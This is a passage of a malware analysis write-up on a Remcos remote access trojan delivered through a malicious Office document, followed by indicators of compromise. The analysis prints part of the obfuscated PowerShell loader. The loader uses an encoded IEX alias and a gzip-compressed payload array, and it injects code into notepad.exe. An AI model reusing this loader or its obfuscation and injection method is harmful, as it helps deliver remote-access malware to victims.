Out[69]: b"function uOXCdlBK {\r\n\r\n\t[CmdletBinding()]\r\n    Param ([byte[]] $JrZNW)\r\n \r\n\tProcess {\r\n\t    \r\n        $YYkG = New-Object 'Syste!>>>>>>>>>>>>>>>>>>>moryStream'.Replace('!>>>>>>>>>>>>>>>>>>>','m.IO.Me') ( , $JrZNW )\r\n\t    $kHTIlDRc = New-Object 'Syste!>>>>>>>>>>>>>>>>>>>moryStream'.Replace('!>>>>>>>>>>>>>>>>>>>','m.IO.Me')\r\n            $bYUNS = New-Object 'System.I!>>>>>>>>>>>>>>>>>>>pStream'.Replace('!>>>>>>>>>>>>>>>>>>>','O.Compression.Gzi') $YYkG, ([IO.Compression.CompressionMode]::Decompress)\r\n\r\n    $ssnKgf = New-Object byte[](1024)\r\n    while($true){\r\n        $yGDi = $bYUNS.Read($ssnKgf, 0, 1024)\r\n        if ($yGDi -le 0){break}\r\n        $kHTIlDRc.Write($ssnKgf, 0, $yGDi)\r\n        }\r\n        \r\n        \r\n\t\t[byte[]] $prW = $kHTIlDRc.ToArray()\r\n        Write-Output $prW\r\n    }\r\n}\r\n\r\n$t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal g $t0;[Byte[]]$MNB=('<%1F,<%8B,<%08,<%00,<%00,<%00,<%00,<%00,<%04,<%00,<%EC,<%BA,<%79,<%3C,<%94,<%5F,<%F4,<%00,<%FC,<%CC,<%62,<%16"

In [70]: data[-1024:]
Out[70]: b"<%C5,<%78,<%1F,<%FC,<%E7,<%21,<%F2,<%FB,<%D7,<%81,<%36,<%4B,<%63,<%D1,<%B5,<%23,<%FD,<%C8,<%28,<%AC,<%09,<%FF,<%8E,<%38,<%4F,<%6E,<%83,<%35,<%33,<%04,<%16,<%44,<%71,<%AD,<%93,<%36,<%4C,<%9B,<%84,<%ED,<%70,<%04,<%74,<%E9,<%0B,<%00,<%CC,<%30,<%9F,<%FF,<%1C,<%25,<%C6,<%22,<%09,<%C3,<%49,<%CA,<%40,<%B2,<%80,<%66,<%72,<%93,<%FC,<%58,<%F2,<%84,<%18,<%C4,<%C4,<%42,<%29,<%8E,<%EF,<%33,<%02,<%DF,<%6B,<%35,<%2C,<%95,<%3A,<%A4,<%01,<%28,<%A7,<%19,<%69,<%85,<%1F,<%A3,<%13,<%E9,<%86,<%D5,<%D2,<%8F,<%0C,<%42,<%F6,<%8F,<%02,<%D7,<%4E,<%22,<%53,<%41,<%B6,<%73,<%C9,<%42,<%B2,<%04,<%2B,<%66,<%15,<%59,<%87,<%54,<%D8,<%86,<%35,<%B9,<%0F,<%67,<%F1,<%08,<%7E,<%26,<%A7,<%F1,<%73,<%79,<%81,<%3D,<%93,<%5F,<%8B,<%D0,<%6A,<%22,<%1D,<%9A,<%E1,<%67,<%F3,<%DF,<%F8,<%05,<%AE,<%3F,<%AE,<%1F,<%D7,<%8F,<%EB,<%C7,<%F5,<%E3,<%FA,<%71,<%FD,<%B8,<%7E,<%5C,<%3F,<%AE,<%1F,<%D7,<%8F,<%EB,<%FF,<%8B,<%EB,<%7F,<%00,<%CD,<%B7,<%BA,<%91,<%00,<%F0,<%01,<%00'.replace('<%','0x'))| g\r\n\r\n  [Byte[]]$MNB22= uOXCdlBK $MNB2\r\n  [Mice]::YU('notepad.exe',$MNB22)\r\n  "



There are two encoded streams. MNB and MNB2. We can extract these streams again via Python:

In [128]: mnb = data[data.index(b"$MNB=('")+9:data.index(b"\'.replace")].replace(b",<%", b"")    
In [129]: mnb2 = data[data.index(b"$MNB2=(\'")+9:data.rindex(b"'.replace")].replace(b",<%", b"")



The Powershell is responsible for launching the innocuous notepad.exe and then modifying it's process memory with the malicious payload. Once loaded, the following mutex name is locked, indicating the presence of Remcos:

Remcos_Mutex_Inj

Indicators

Date Observed Indicator Type Indicator
7/9/2020 DOCX Document 41c99b18ea6e24259573bd82c3fa967ea47fc204afd770bbfadfff42862ca528
7/9/2020 DOTM Document 0892656183c07a099887cd0ad837f05d17cd77a8d253f3e8b637bc099c3bcb0b
7/9/2020 Domain Name r0lls-r0yce.com
7/9/2020 IP Address 185.172.110.217 AS206898 NL BLADESERVERS

Malware Samples

Remcos

Tags
Maldoc Remcos Remote Access Trojan Threat Hunting